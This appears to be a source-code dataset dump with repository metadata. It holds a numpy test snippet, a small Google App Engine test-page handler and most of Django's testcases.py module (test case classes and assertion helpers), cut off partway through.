[0, 0, 0, 0],
[0, 0, 0, 14]])
ev_chunks[2].results = [3]
answers[2] = lambda x : 13 if x.results in ([3], [2]) else 0
grid = full_grid(answers, ev_chunks)
np.testing.assert_array_equal(grid, [[11, 0, 0, 0],
[0, 12, 0, 0],
[0, 13, 13, 0],
[0, 0, 0, 14]])
def test_max_multi():
assert_array_equal(max_multi([[1, 2], [3, 4]]), [2, 4])
assert_array_equal(max_multi([[2, 1], [4, 3]]), [2, 4])
# Same chunk gives max score on two questions.
assert_array_equal(max_multi([[2, 1, 4], [4, 3, 6]]), [4, 6])
# NaNs treated as zero
assert_array_equal(max_multi([[2, np.nan, 4], [np.nan, 3, 6]]), [4, 6])
assert_array_equal(max_multi([[np.nan, np.nan, np.nan], [np.nan, 3, 6]]),
[0, 6])
assert_array_equal(max_multi(np.ones((4, 4))), np.ones((4,)))
assert_array_equal(max_multi(np.ones((4, 4)) + np.nan), np.zeros((4,)))
| 45.224138 | 78 | 0.55204 |
795548358453ddc1441b0b203fb47f59e5e378a9 | 1,018 | py | Python | snipbin/test/test.py | landsurveyorsunited/snippy-extension | efa4681ea4f33497726004b9cad360a31a4caf60 | [
"CC-BY-3.0"
] | null | null | null | snipbin/test/test.py | landsurveyorsunited/snippy-extension | efa4681ea4f33497726004b9cad360a31a4caf60 | [
"CC-BY-3.0"
] | null | null | null | snipbin/test/test.py | landsurveyorsunited/snippy-extension | efa4681ea4f33497726004b9cad360a31a4caf60 | [
"CC-BY-3.0"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2009 Riccardo Govoni. All rights reserved.
# Use of this source code is governed by the MIT License and Creative Commons
# Attribution License 3.0. Both of them can be found in the LICENSE file.
import os.path
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from google.appengine.ext.webapp.util import run_wsgi_app
from py import snipglobals
class TestHandler(webapp.RequestHandler):
def get(self):
user, template_values = snipglobals.initialize_user(self.request,
self.response)
path = os.path.join(os.path.dirname(__file__), '../templates/test.html')
self.response.out.write(template.render(path, template_values))
application = webapp.WSGIApplication([('/test', TestHandler)],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == '__main__':
main()
| 29.085714 | 78 | 0.68664 |
7955488f48bd804020fe23407a705c628de5612e | 54,928 | py | Python | django/test/testcases.py | bak1an/django | 98bcc5d81bca578f3a5b4d47907ba4ac40446887 | [
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null | django/test/testcases.py | bak1an/django | 98bcc5d81bca578f3a5b4d47907ba4ac40446887 | [
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null | django/test/testcases.py | bak1an/django | 98bcc5d81bca578f3a5b4d47907ba4ac40446887 | [
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null | import difflib
import json
import posixpath
import sys
import threading
import unittest
from collections import Counter
from contextlib import contextmanager
from copy import copy
from functools import wraps
from unittest.util import safe_repr
from urllib.parse import unquote, urljoin, urlparse, urlsplit
from urllib.request import url2pathname
from django.apps import apps
from django.conf import settings
from django.core import mail
from django.core.exceptions import ValidationError
from django.core.files import locks
from django.core.handlers.wsgi import WSGIHandler, get_path_info
from django.core.management import call_command
from django.core.management.color import no_style
from django.core.management.sql import emit_post_migrate_signal
from django.core.servers.basehttp import ThreadedWSGIServer, WSGIRequestHandler
from django.db import DEFAULT_DB_ALIAS, connection, connections, transaction
from django.forms.fields import CharField
from django.http import QueryDict
from django.http.request import split_domain_port, validate_host
from django.test.client import Client
from django.test.html import HTMLParseError, parse_html
from django.test.signals import setting_changed, template_rendered
from django.test.utils import (
CaptureQueriesContext, ContextList, compare_xml, modify_settings,
override_settings,
)
from django.utils.decorators import classproperty
from django.utils.encoding import force_text
from django.views.static import serve
__all__ = ('TestCase', 'TransactionTestCase',
'SimpleTestCase', 'skipIfDBFeature', 'skipUnlessDBFeature')
def to_list(value):
"""
Puts value into a list if it's not already one.
Returns an empty list if value is None.
"""
if value is None:
value = []
elif not isinstance(value, list):
value = [value]
return value
def assert_and_parse_html(self, html, user_msg, msg):
try:
dom = parse_html(html)
except HTMLParseError as e:
standardMsg = '%s\n%s' % (msg, e)
self.fail(self._formatMessage(user_msg, standardMsg))
return dom
class _AssertNumQueriesContext(CaptureQueriesContext):
def __init__(self, test_case, num, connection):
self.test_case = test_case
self.num = num
super().__init__(connection)
def __exit__(self, exc_type, exc_value, traceback):
super().__exit__(exc_type, exc_value, traceback)
if exc_type is not None:
return
executed = len(self)
self.test_case.assertEqual(
executed, self.num,
"%d queries executed, %d expected\nCaptured queries were:\n%s" % (
executed, self.num,
'\n'.join(
query['sql'] for query in self.captured_queries
)
)
)
class _AssertTemplateUsedContext:
def __init__(self, test_case, template_name):
self.test_case = test_case
self.template_name = template_name
self.rendered_templates = []
self.rendered_template_names = []
self.context = ContextList()
def on_template_render(self, sender, signal, template, context, **kwargs):
self.rendered_templates.append(template)
self.rendered_template_names.append(template.name)
self.context.append(copy(context))
def test(self):
return self.template_name in self.rendered_template_names
def message(self):
return '%s was not rendered.' % self.template_name
def __enter__(self):
template_rendered.connect(self.on_template_render)
return self
def __exit__(self, exc_type, exc_value, traceback):
template_rendered.disconnect(self.on_template_render)
if exc_type is not None:
return
if not self.test():
message = self.message()
if len(self.rendered_templates) == 0:
message += ' No template was rendered.'
else:
message += ' Following templates were rendered: %s' % (
', '.join(self.rendered_template_names))
self.test_case.fail(message)
class _AssertTemplateNotUsedContext(_AssertTemplateUsedContext):
def test(self):
return self.template_name not in self.rendered_template_names
def message(self):
return '%s was rendered.' % self.template_name
class _CursorFailure:
def __init__(self, cls_name, wrapped):
self.cls_name = cls_name
self.wrapped = wrapped
def __call__(self):
raise AssertionError(
"Database queries aren't allowed in SimpleTestCase. "
"Either use TestCase or TransactionTestCase to ensure proper test isolation or "
"set %s.allow_database_queries to True to silence this failure." % self.cls_name
)
class SimpleTestCase(unittest.TestCase):
# The class we'll use for the test client self.client.
# Can be overridden in derived classes.
client_class = Client
_overridden_settings = None
_modified_settings = None
# Tests shouldn't be allowed to query the database since
# this base class doesn't enforce any isolation.
allow_database_queries = False
@classmethod
def setUpClass(cls):
super().setUpClass()
if cls._overridden_settings:
cls._cls_overridden_context = override_settings(**cls._overridden_settings)
cls._cls_overridden_context.enable()
if cls._modified_settings:
cls._cls_modified_context = modify_settings(cls._modified_settings)
cls._cls_modified_context.enable()
if not cls.allow_database_queries:
for alias in connections:
connection = connections[alias]
connection.cursor = _CursorFailure(cls.__name__, connection.cursor)
connection.chunked_cursor = _CursorFailure(cls.__name__, connection.chunked_cursor)
@classmethod
def tearDownClass(cls):
if not cls.allow_database_queries:
for alias in connections:
connection = connections[alias]
connection.cursor = connection.cursor.wrapped
connection.chunked_cursor = connection.chunked_cursor.wrapped
if hasattr(cls, '_cls_modified_context'):
cls._cls_modified_context.disable()
delattr(cls, '_cls_modified_context')
if hasattr(cls, '_cls_overridden_context'):
cls._cls_overridden_context.disable()
delattr(cls, '_cls_overridden_context')
super().tearDownClass()
def __call__(self, result=None):
"""
Wrapper around default __call__ method to perform common Django test
set up. This means that user-defined Test Cases aren't required to
include a call to super().setUp().
"""
testMethod = getattr(self, self._testMethodName)
skipped = (
getattr(self.__class__, "__unittest_skip__", False) or
getattr(testMethod, "__unittest_skip__", False)
)
if not skipped:
try:
self._pre_setup()
except Exception:
result.addError(self, sys.exc_info())
return
super().__call__(result)
if not skipped:
try:
self._post_teardown()
except Exception:
result.addError(self, sys.exc_info())
return
def _pre_setup(self):
"""Performs any pre-test setup. This includes:
* Creating a test client.
* Clearing the mail test outbox.
"""
self.client = self.client_class()
mail.outbox = []
def _post_teardown(self):
"""Perform any post-test things."""
pass
def settings(self, **kwargs):
"""
A context manager that temporarily sets a setting and reverts to the original value when exiting the context.
"""
return override_settings(**kwargs)
def modify_settings(self, **kwargs):
"""
A context manager that temporarily applies changes a list setting and
reverts back to the original value when exiting the context.
"""
return modify_settings(**kwargs)
def assertRedirects(self, response, expected_url, status_code=302,
target_status_code=200, msg_prefix='',
fetch_redirect_response=True):
"""Asserts that a response redirected to a specific URL, and that the
redirect URL can be loaded.
Note that assertRedirects won't work for external links since it uses
TestClient to do a request (use fetch_redirect_response=False to check
such links without fetching them).
"""
if msg_prefix:
msg_prefix += ": "
if hasattr(response, 'redirect_chain'):
# The request was a followed redirect
self.assertTrue(
len(response.redirect_chain) > 0,
msg_prefix + "Response didn't redirect as expected: Response code was %d (expected %d)"
% (response.status_code, status_code)
)
self.assertEqual(
response.redirect_chain[0][1], status_code,
msg_prefix + "Initial response didn't redirect as expected: Response code was %d (expected %d)"
% (response.redirect_chain[0][1], status_code)
)
url, status_code = response.redirect_chain[-1]
scheme, netloc, path, query, fragment = urlsplit(url)
self.assertEqual(
response.status_code, target_status_code,
msg_prefix + "Response didn't redirect as expected: Final Response code was %d (expected %d)"
% (response.status_code, target_status_code)
)
else:
# Not a followed redirect
self.assertEqual(
response.status_code, status_code,
msg_prefix + "Response didn't redirect as expected: Response code was %d (expected %d)"
% (response.status_code, status_code)
)
url = response.url
scheme, netloc, path, query, fragment = urlsplit(url)
# Prepend the request path to handle relative path redirects.
if not path.startswith('/'):
url = urljoin(response.request['PATH_INFO'], url)
path = urljoin(response.request['PATH_INFO'], path)
if fetch_redirect_response:
# netloc might be empty, or in cases where Django tests the
# HTTP scheme, the convention is for netloc to be 'testserver'.
# Trust both as "internal" URLs here.
domain, port = split_domain_port(netloc)
if domain and not validate_host(domain, settings.ALLOWED_HOSTS):
raise ValueError(
"The test client is unable to fetch remote URLs (got %s). "
"If the host is served by Django, add '%s' to ALLOWED_HOSTS. "
"Otherwise, use assertRedirects(..., fetch_redirect_response=False)."
% (url, domain)
)
redirect_response = response.client.get(path, QueryDict(query), secure=(scheme == 'https'))
# Get the redirection page, using the same client that was used
# to obtain the original response.
self.assertEqual(
redirect_response.status_code, target_status_code,
msg_prefix + "Couldn't retrieve redirection page '%s': response code was %d (expected %d)"
% (path, redirect_response.status_code, target_status_code)
)
self.assertEqual(
url, expected_url,
msg_prefix + "Response redirected to '%s', expected '%s'" % (url, expected_url)
)
def _assert_contains(self, response, text, status_code, msg_prefix, html):
# If the response supports deferred rendering and hasn't been rendered
# yet, then ensure that it does get rendered before proceeding further.
if hasattr(response, 'render') and callable(response.render) and not response.is_rendered:
response.render()
if msg_prefix:
msg_prefix += ": "
self.assertEqual(
response.status_code, status_code,
msg_prefix + "Couldn't retrieve content: Response code was %d"
" (expected %d)" % (response.status_code, status_code)
)
if response.streaming:
content = b''.join(response.streaming_content)
else:
content = response.content
if not isinstance(text, bytes) or html:
text = force_text(text, encoding=response.charset)
content = content.decode(response.charset)
text_repr = "'%s'" % text
else:
text_repr = repr(text)
if html:
content = assert_and_parse_html(self, content, None, "Response's content is not valid HTML:")
text = assert_and_parse_html(self, text, None, "Second argument is not valid HTML:")
real_count = content.count(text)
return (text_repr, real_count, msg_prefix)
def assertContains(self, response, text, count=None, status_code=200, msg_prefix='', html=False):
"""
Asserts that a response indicates that some content was retrieved
successfully, (i.e., the HTTP status code was as expected), and that
``text`` occurs ``count`` times in the content of the response.
If ``count`` is None, the count doesn't matter - the assertion is true
if the text occurs at least once in the response.
"""
text_repr, real_count, msg_prefix = self._assert_contains(
response, text, status_code, msg_prefix, html)
if count is not None:
self.assertEqual(
real_count, count,
msg_prefix + "Found %d instances of %s in response (expected %d)" % (real_count, text_repr, count)
)
else:
self.assertTrue(real_count != 0, msg_prefix + "Couldn't find %s in response" % text_repr)
def assertNotContains(self, response, text, status_code=200, msg_prefix='', html=False):
"""
Asserts that a response indicates that some content was retrieved
successfully, (i.e., the HTTP status code was as expected), and that
``text`` doesn't occurs in the content of the response.
"""
text_repr, real_count, msg_prefix = self._assert_contains(
response, text, status_code, msg_prefix, html)
self.assertEqual(real_count, 0, msg_prefix + "Response should not contain %s" % text_repr)
def assertFormError(self, response, form, field, errors, msg_prefix=''):
"""
Asserts that a form used to render the response has a specific field
error.
"""
if msg_prefix:
msg_prefix += ": "
# Put context(s) into a list to simplify processing.
contexts = to_list(response.context)
if not contexts:
self.fail(msg_prefix + "Response did not use any contexts to render the response")
# Put error(s) into a list to simplify processing.
errors = to_list(errors)
# Search all contexts for the error.
found_form = False
for i, context in enumerate(contexts):
if form not in context:
continue
found_form = True
for err in errors:
if field:
if field in context[form].errors:
field_errors = context[form].errors[field]
self.assertTrue(
err in field_errors,
msg_prefix + "The field '%s' on form '%s' in"
" context %d does not contain the error '%s'"
" (actual errors: %s)" %
(field, form, i, err, repr(field_errors))
)
elif field in context[form].fields:
self.fail(
msg_prefix + "The field '%s' on form '%s' in context %d contains no errors" %
(field, form, i)
)
else:
self.fail(
msg_prefix + "The form '%s' in context %d does not contain the field '%s'" %
(form, i, field)
)
else:
non_field_errors = context[form].non_field_errors()
self.assertTrue(
err in non_field_errors,
msg_prefix + "The form '%s' in context %d does not"
" contain the non-field error '%s'"
" (actual errors: %s)" %
(form, i, err, non_field_errors)
)
if not found_form:
self.fail(msg_prefix + "The form '%s' was not used to render the response" % form)
def assertFormsetError(self, response, formset, form_index, field, errors,
msg_prefix=''):
"""
Asserts that a formset used to render the response has a specific error.
For field errors, specify the ``form_index`` and the ``field``.
For non-field errors, specify the ``form_index`` and the ``field`` as
None.
For non-form errors, specify ``form_index`` as None and the ``field``
as None.
"""
# Add punctuation to msg_prefix
if msg_prefix:
msg_prefix += ": "
# Put context(s) into a list to simplify processing.
contexts = to_list(response.context)
if not contexts:
self.fail(msg_prefix + 'Response did not use any contexts to '
'render the response')
# Put error(s) into a list to simplify processing.
errors = to_list(errors)
# Search all contexts for the error.
found_formset = False
for i, context in enumerate(contexts):
if formset not in context:
continue
found_formset = True
for err in errors:
if field is not None:
if field in context[formset].forms[form_index].errors:
field_errors = context[formset].forms[form_index].errors[field]
self.assertTrue(
err in field_errors,
msg_prefix + "The field '%s' on formset '%s', "
"form %d in context %d does not contain the "
"error '%s' (actual errors: %s)" %
(field, formset, form_index, i, err, repr(field_errors))
)
elif field in context[formset].forms[form_index].fields:
self.fail(
msg_prefix + "The field '%s' on formset '%s', form %d in context %d contains no errors"
% (field, formset, form_index, i)
)
else:
self.fail(
msg_prefix + "The formset '%s', form %d in context %d does not contain the field '%s'"
% (formset, form_index, i, field)
)
elif form_index is not None:
non_field_errors = context[formset].forms[form_index].non_field_errors()
self.assertFalse(
len(non_field_errors) == 0,
msg_prefix + "The formset '%s', form %d in context %d "
"does not contain any non-field errors." % (formset, form_index, i)
)
self.assertTrue(
err in non_field_errors,
msg_prefix + "The formset '%s', form %d in context %d "
"does not contain the non-field error '%s' (actual errors: %s)"
% (formset, form_index, i, err, repr(non_field_errors))
)
else:
non_form_errors = context[formset].non_form_errors()
self.assertFalse(
len(non_form_errors) == 0,
msg_prefix + "The formset '%s' in context %d does not "
"contain any non-form errors." % (formset, i)
)
self.assertTrue(
err in non_form_errors,
msg_prefix + "The formset '%s' in context %d does not "
"contain the non-form error '%s' (actual errors: %s)"
% (formset, i, err, repr(non_form_errors))
)
if not found_formset:
self.fail(msg_prefix + "The formset '%s' was not used to render the response" % formset)
def _assert_template_used(self, response, template_name, msg_prefix):
if response is None and template_name is None:
raise TypeError('response and/or template_name argument must be provided')
if msg_prefix:
msg_prefix += ": "
if template_name is not None and response is not None and not hasattr(response, 'templates'):
raise ValueError(
"assertTemplateUsed() and assertTemplateNotUsed() are only "
"usable on responses fetched using the Django test Client."
)
if not hasattr(response, 'templates') or (response is None and template_name):
if response:
template_name = response
response = None
# use this template with context manager
return template_name, None, msg_prefix
template_names = [t.name for t in response.templates if t.name is not None]
return None, template_names, msg_prefix
def assertTemplateUsed(self, response=None, template_name=None, msg_prefix='', count=None):
"""
Asserts that the template with the provided name was used in rendering
the response. Also usable as context manager.
"""
context_mgr_template, template_names, msg_prefix = self._assert_template_used(
response, template_name, msg_prefix)
if context_mgr_template:
# Use assertTemplateUsed as context manager.
return _AssertTemplateUsedContext(self, context_mgr_template)
if not template_names:
self.fail(msg_prefix + "No templates used to render the response")
self.assertTrue(
template_name in template_names,
msg_prefix + "Template '%s' was not a template used to render"
" the response. Actual template(s) used: %s"
% (template_name, ', '.join(template_names))
)
if count is not None:
self.assertEqual(
template_names.count(template_name), count,
msg_prefix + "Template '%s' was expected to be rendered %d "
"time(s) but was actually rendered %d time(s)."
% (template_name, count, template_names.count(template_name))
)
def assertTemplateNotUsed(self, response=None, template_name=None, msg_prefix=''):
"""
Asserts that the template with the provided name was NOT used in
rendering the response. Also usable as context manager.
"""
context_mgr_template, template_names, msg_prefix = self._assert_template_used(
response, template_name, msg_prefix
)
if context_mgr_template:
# Use assertTemplateNotUsed as context manager.
return _AssertTemplateNotUsedContext(self, context_mgr_template)
self.assertFalse(
template_name in template_names,
msg_prefix + "Template '%s' was used unexpectedly in rendering the response" % template_name
)
@contextmanager
def _assert_raises_message_cm(self, expected_exception, expected_message):
with self.assertRaises(expected_exception) as cm:
yield cm
self.assertIn(expected_message, str(cm.exception))
def assertRaisesMessage(self, expected_exception, expected_message, *args, **kwargs):
"""
Asserts that expected_message is found in the the message of a raised
exception.
Args:
expected_exception: Exception class expected to be raised.
expected_message: expected error message string value.
args: Function to be called and extra positional args.
kwargs: Extra kwargs.
"""
callable_obj = None
if len(args):
callable_obj = args[0]
args = args[1:]
cm = self._assert_raises_message_cm(expected_exception, expected_message)
# Assertion used in context manager fashion.
if callable_obj is None:
return cm
# Assertion was passed a callable.
with cm:
callable_obj(*args, **kwargs)
def assertFieldOutput(self, fieldclass, valid, invalid, field_args=None,
field_kwargs=None, empty_value=''):
"""
Asserts that a form field behaves correctly with various inputs.
Args:
fieldclass: the class of the field to be tested.
valid: a dictionary mapping valid inputs to their expected
cleaned values.
invalid: a dictionary mapping invalid inputs to one or more
raised error messages.
field_args: the args passed to instantiate the field
field_kwargs: the kwargs passed to instantiate the field
empty_value: the expected clean output for inputs in empty_values
"""
if field_args is None:
field_args = []
if field_kwargs is None:
field_kwargs = {}
required = fieldclass(*field_args, **field_kwargs)
optional = fieldclass(*field_args, **dict(field_kwargs, required=False))
# test valid inputs
for input, output in valid.items():
self.assertEqual(required.clean(input), output)
self.assertEqual(optional.clean(input), output)
# test invalid inputs
for input, errors in invalid.items():
with self.assertRaises(ValidationError) as context_manager:
required.clean(input)
self.assertEqual(context_manager.exception.messages, errors)
with self.assertRaises(ValidationError) as context_manager:
optional.clean(input)
self.assertEqual(context_manager.exception.messages, errors)
# test required inputs
error_required = [force_text(required.error_messages['required'])]
for e in required.empty_values:
with self.assertRaises(ValidationError) as context_manager:
required.clean(e)
self.assertEqual(context_manager.exception.messages, error_required)
self.assertEqual(optional.clean(e), empty_value)
# test that max_length and min_length are always accepted
if issubclass(fieldclass, CharField):
field_kwargs.update({'min_length': 2, 'max_length': 20})
self.assertIsInstance(fieldclass(*field_args, **field_kwargs), fieldclass)
def assertHTMLEqual(self, html1, html2, msg=None):
"""
Asserts that two HTML snippets are semantically the same.
Whitespace in most cases is ignored, and attribute ordering is not
significant. The passed-in arguments must be valid HTML.
"""
dom1 = assert_and_parse_html(self, html1, msg, 'First argument is not valid HTML:')
dom2 = assert_and_parse_html(self, html2, msg, 'Second argument is not valid HTML:')
if dom1 != dom2:
standardMsg = '%s != %s' % (
safe_repr(dom1, True), safe_repr(dom2, True))
diff = ('\n' + '\n'.join(difflib.ndiff(
str(dom1).splitlines(), str(dom2).splitlines(),
)))
standardMsg = self._truncateMessage(standardMsg, diff)
self.fail(self._formatMessage(msg, standardMsg))
def assertHTMLNotEqual(self, html1, html2, msg=None):
"""Asserts that two HTML snippets are not semantically equivalent."""
dom1 = assert_and_parse_html(self, html1, msg, 'First argument is not valid HTML:')
dom2 = assert_and_parse_html(self, html2, msg, 'Second argument is not valid HTML:')
if dom1 == dom2:
standardMsg = '%s == %s' % (
safe_repr(dom1, True), safe_repr(dom2, True))
self.fail(self._formatMessage(msg, standardMsg))
def assertInHTML(self, needle, haystack, count=None, msg_prefix=''):
needle = assert_and_parse_html(self, needle, None, 'First argument is not valid HTML:')
haystack = assert_and_parse_html(self, haystack, None, 'Second argument is not valid HTML:')
real_count = haystack.count(needle)
if count is not None:
self.assertEqual(
real_count, count,
msg_prefix + "Found %d instances of '%s' in response (expected %d)" % (real_count, needle, count)
)
else:
self.assertTrue(real_count != 0, msg_prefix + "Couldn't find '%s' in response" % needle)
def assertJSONEqual(self, raw, expected_data, msg=None):
"""
Asserts that the JSON fragments raw and expected_data are equal.
Usual JSON non-significant whitespace rules apply as the heavyweight
is delegated to the json library.
"""
try:
data = json.loads(raw)
except ValueError:
self.fail("First argument is not valid JSON: %r" % raw)
if isinstance(expected_data, str):
try:
expected_data = json.loads(expected_data)
except ValueError:
self.fail("Second argument is not valid JSON: %r" % expected_data)
self.assertEqual(data, expected_data, msg=msg)
def assertJSONNotEqual(self, raw, expected_data, msg=None):
"""
Asserts that the JSON fragments raw and expected_data are not equal.
Usual JSON non-significant whitespace rules apply as the heavyweight
is delegated to the json library.
"""
try:
data = json.loads(raw)
except ValueError:
self.fail("First argument is not valid JSON: %r" % raw)
if isinstance(expected_data, str):
try:
expected_data = json.loads(expected_data)
except ValueError:
self.fail("Second argument is not valid JSON: %r" % expected_data)
self.assertNotEqual(data, expected_data, msg=msg)
def assertXMLEqual(self, xml1, xml2, msg=None):
"""
Asserts that two XML snippets are semantically the same.
Whitespace in most cases is ignored, and attribute ordering is not
significant. The passed-in arguments must be valid XML.
"""
try:
result = compare_xml(xml1, xml2)
except Exception as e:
standardMsg = 'First or second argument is not valid XML\n%s' % e
self.fail(self._formatMessage(msg, standardMsg))
else:
if not result:
standardMsg = '%s != %s' % (safe_repr(xml1, True), safe_repr(xml2, True))
diff = ('\n' + '\n'.join(
difflib.ndiff(xml1.splitlines(), xml2.splitlines())
))
standardMsg = self._truncateMessage(standardMsg, diff)
self.fail(self._formatMessage(msg, standardMsg))
def assertXMLNotEqual(self, xml1, xml2, msg=None):
"""
Asserts that two XML snippets are not semantically equivalent.
Whitespace in most cases is ignored, and attribute ordering is not
significant. The passed-in arguments must be valid XML.
"""
try:
result = compare_xml(xml1, xml2)
except Exception as e:
standardMsg = 'First or second argument is not valid XML\n%s' % e
self.fail(self._formatMessage(msg, standardMsg))
else:
if result:
standardMsg = '%s == %s' % (safe_repr(xml1, True), safe_repr(xml2, True))
self.fail(self._formatMessage(msg, standardMsg))
class TransactionTestCase(SimpleTestCase):
# Subclasses can ask for resetting of auto increment sequence before each
# test case
reset_sequences = False
# Subclasses can enable only a subset of apps for faster tests
available_apps = None
# Subclasses can define fixtures which will be automatically installed.
fixtures = None
# If transactions aren't available, Django will serialize the database
# contents into a fixture during setup and flush and reload them
# during teardown (as flush does not restore data from migrations).
# This can be slow; this flag allows enabling on a per-case basis.
serialized_rollback = False
# Since tests will be wrapped in a transaction, or serialized if they
# are not available, we allow queries to be run.
allow_database_queries = True
def _pre_setup(self):
"""Performs any pre-test setup. This includes:
* If the class has an 'available_apps' attribute, restricting the app
registry to these applications, then firing post_migrate -- it must
run with the correct set of applications for the test case.
* If the class has a 'fixtures' attribute, installing these fixtures.
"""
super()._pre_setup()
if self.available_apps is not None:
apps.set_available_apps(self.available_apps)
setting_changed.send(
sender=settings._wrapped.__class__,
setting='INSTALLED_APPS',
value=self.available_apps,
enter=True,
)
for db_name in self._databases_names(include_mirrors=False):
emit_post_migrate_signal(verbosity=0, interactive=False, db=db_name)
try:
self._fixture_setup()
except Exception:
if self.available_apps is not None:
apps.unset_available_apps()
setting_changed.send(
sender=settings._wrapped.__class__,
setting='INSTALLED_APPS',
value=settings.INSTALLED_APPS,
enter=False,
)
raise
@classmethod
def _databases_names(cls, include_mirrors=True):
# If the test case has a multi_db=True flag, act on all databases,
# including mirrors or not. Otherwise, just on the default DB.
if getattr(cls, 'multi_db', False):
return [
alias for alias in connections
if include_mirrors or not connections[alias].settings_dict['TEST']['MIRROR']
]
else:
return [DEFAULT_DB_ALIAS]
def _reset_sequences(self, db_name):
conn = connections[db_name]
if conn.features.supports_sequence_reset:
sql_list = conn.ops.sequence_reset_by_name_sql(
no_style(), conn.introspection.sequence_list())
if sql_list:
with transaction.atomic(using=db_name):
cursor = conn.cursor()
for sql in sql_list:
cursor.execute(sql)
def _fixture_setup(self):
for db_name in self._databases_names(include_mirrors=False):
# Reset sequences
if self.reset_sequences:
self._reset_sequences(db_name)
# If we need to provide replica initial data from migrated apps,
# then do so.
if self.serialized_rollback and hasattr(connections[db_name], "_test_serialized_contents"):
if self.available_apps is not None:
apps.unset_available_apps()
connections[db_name].creation.deserialize_db_from_string(
connections[db_name]._test_serialized_contents
)
if self.available_apps is not None:
apps.set_available_apps(self.available_apps)
if self.fixtures:
# We have to use this slightly awkward syntax due to the fact
# that we're using *args and **kwargs together.
call_command('loaddata', *self.fixtures,
**{'verbosity': 0, 'database': db_name})
def _should_reload_connections(self):
return True
def _post_teardown(self):
"""Performs any post-test things. This includes:
* Flushing the contents of the database, to leave a clean slate. If
the class has an 'available_apps' attribute, post_migrate isn't fired.
* Force-closing the connection, so the next test gets a clean cursor.
"""
try:
self._fixture_teardown()
super()._post_teardown()
if self._should_reload_connections():
# Some DB cursors include SQL statements as part of cursor
# creation. If you have a test that does a rollback, the effect
# of these statements is lost, which can affect the operation of
# tests (e.g., losing a timezone setting causing objects to be
# created with the wrong time). To make sure this doesn't
# happen, get a clean connection at the start of every test.
for conn in connections.all():
conn.close()
finally:
if self.available_apps is not None:
apps.unset_available_apps()
setting_changed.send(sender=settings._wrapped.__class__,
setting='INSTALLED_APPS',
value=settings.INSTALLED_APPS,
enter=False)
def _fixture_teardown(self):
# Allow TRUNCATE ... CASCADE and don't emit the post_migrate signal
# when flushing only a subset of the apps
for db_name in self._databases_names(include_mirrors=False):
# Flush the database
inhibit_post_migrate = (
self.available_apps is not None or
( # Inhibit the post_migrate signal when using serialized
# rollback to avoid trying to recreate the serialized data.
self.serialized_rollback and
hasattr(connections[db_name], '_test_serialized_contents')
)
)
call_command('flush', verbosity=0, interactive=False,
database=db_name, reset_sequences=False,
allow_cascade=self.available_apps is not None,
inhibit_post_migrate=inhibit_post_migrate)
def assertQuerysetEqual(self, qs, values, transform=repr, ordered=True, msg=None):
items = map(transform, qs)
if not ordered:
return self.assertEqual(Counter(items), Counter(values), msg=msg)
values = list(values)
# For example qs.iterator() could be passed as qs, but it does not
# have 'ordered' attribute.
if len(values) > 1 and hasattr(qs, 'ordered') and not qs.ordered:
raise ValueError("Trying to compare non-ordered queryset "
"against more than one ordered values")
return self.assertEqual(list(items), values, msg=msg)
def assertNumQueries(self, num, func=None, *args, using=DEFAULT_DB_ALIAS, **kwargs):
conn = connections[using]
context = _AssertNumQueriesContext(self, num, conn)
if func is None:
return context
with context:
func(*args, **kwargs)
def connections_support_transactions():
"""
Returns True if all connections support transactions.
"""
return all(conn.features.supports_transactions
for conn in connections.all())
class TestCase(TransactionTestCase):
"""
Similar to TransactionTestCase, but uses `transaction.atomic()` to achieve
test isolation.
In most situations, TestCase should be preferred to TransactionTestCase as
it allows faster execution. However, there are some situations where using
TransactionTestCase might be necessary (e.g. testing some transactional
behavior).
On database backends with no transaction support, TestCase behaves as
TransactionTestCase.
"""
@classmethod
def _enter_atomics(cls):
"""Helper method to open atomic blocks for multiple databases"""
atomics = {}
for db_name in cls._databases_names():
atomics[db_name] = transaction.atomic(using=db_name)
atomics[db_name].__enter__()
return atomics
@classmethod
def _rollback_atomics(cls, atomics):
"""Rollback atomic blocks opened through the previous method"""
for db_name in reversed(cls._databases_names()):
transaction.set_rollback(True, using=db_name)
atomics[db_name].__exit__(None, None, None)
@classmethod
def setUpClass(cls):
super().setUpClass()
if not connections_support_transactions():
return
cls.cls_atomics = cls._enter_atomics()
if cls.fixtures:
for db_name in cls._databases_names(include_mirrors=False):
try:
call_command('loaddata', *cls.fixtures, **{
'verbosity': 0,
'commit': False,
'database': db_name,
})
except Exception:
cls._rollback_atomics(cls.cls_atomics)
raise
try:
cls.setUpTestData()
except Exception:
cls._rollback_atomics(cls.cls_atomics)
raise
@classmethod
def tearDownClass(cls):
if connections_support_transactions():
cls._rollback_atomics(cls.cls_atomics)
for conn in connections.all():
conn.close()
super().tearDownClass()
@classmethod
def setUpTestData(cls):
"""Load initial data for the TestCase"""
pass
def _should_reload_connections(self):
if connections_support_transactions():
return False
return super()._should_reload_connections()
def _fixture_setup(self):
if not connections_support_transactions():
# If the backend does not support transactions, we should reload
# class data before each test
self.setUpTestData()
return super()._fixture_setup()
assert not self.reset_sequences, 'reset_sequences cannot be used on TestCase instances'
self.atomics = self._enter_atomics()
def _fixture_teardown(self):
if not connections_support_transactions():
return super()._fixture_teardown()
try:
for db_name in reversed(self._databases_names()):
if self._should_check_constraints(connections[db_name]):
connections[db_name].check_constraints()
finally:
self._rollback_atomics(self.atomics)
def _should_check_constraints(self, connection):
return (
connection.features.can_defer_constraint_checks and
not connection.needs_rollback and connection.is_usable()
)
class CheckCondition:
"""Descriptor class for deferred condition checking"""
def __init__(self, *conditions):
self.conditions = conditions
def add_condition(self, condition, reason):
return self.__class__(*self.conditions + ((condition, reason),))
def __get__(self, instance, cls=None):
# Trigger access for all bases.
if any(getattr(base, '__unittest_skip__', False) for base in cls.__bases__):
return True
for condition, reason in self.conditions:
if condition():
# Override this descriptor's value and set the skip reason.
cls.__unittest_skip__ = True
cls.__unittest_skip_why__ = reason
return True
return False
def _deferredSkip(condition, reason):
def decorator(test_func):
if not (isinstance(test_func, type) and
issubclass(test_func, unittest.TestCase)):
@wraps(test_func)
def skip_wrapper(*args, **kwargs):
if condition():
raise unittest.SkipTest(reason)
return test_func(*args, **kwargs)
test_item = skip_wrapper
else:
# Assume a class is decorated
